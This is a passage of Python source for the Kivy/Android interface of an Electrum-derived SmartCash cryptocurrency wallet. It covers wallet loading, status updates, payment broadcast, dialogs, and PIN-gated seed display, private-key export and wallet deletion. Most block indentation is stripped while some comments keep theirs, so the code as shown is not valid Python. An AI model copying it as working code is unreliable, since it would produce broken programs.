mActivity.moveTaskToBack(True)
def on_start(self):
        '''Entry point of the Kivy UI.
        '''
        Logger.info('Time to on_start: {:.2f}s'.format(time.perf_counter()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
        # bind intent for the smartcash: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
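    # Loads the wallet at `path`: prompts for the PIN when it is encrypted,
    # or launches the install wizard when no wallet file exists yet.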
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        '''Initialize the UX part of Electrum. Performs the basic tasks of
        setting up the UI.
        '''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_smart_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_smart_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum-smart.png"
self.tabs = self.root.ids['tabs']
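    # Refreshes the cached network statistics (nodes, chains, checkpoint,
    # server host) whenever the 'interfaces' network event fires.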
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
        # Once the GUI has been initialized, check whether anything needs to be
        # announced, since callbacks may have fired before the GUI existed.
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
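    # Rebuilds the header status line (wallet name plus offline/synchronizing/
    # lagging state) and the formatted balance strings.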
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
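    # '!' as the output amount is Electrum's "send maximum" convention; the
    # dummy transaction is built so the fee gets deducted before formatting.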
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
        if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
        '''Show an error message bubble.
        '''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
        '''Show an info message bubble.
        '''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
        '''Show an information bubble.

        :param text: message to display
        :param pos: position of the bubble
        :param duration: time the bubble stays on screen; 0 = hide on click
        :param width: width of the bubble
        :param arrow_pos: arrow position of the bubble
        :param icon: icon source, or a texture when `text` == 'texture'
        :param modal: whether the bubble is shown modally
        :param exit: whether to close the application when the bubble is dismissed
        '''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
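    # Broadcast runs on a worker thread; the result is marshalled back to the
    # UI thread through Clock.schedule_once.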
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
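    # Gate an action behind PIN entry: when the wallet has a password, prompt
    # for it first and append it to the call's arguments; otherwise pass None.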
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
            except Exception:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
        except Exception:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))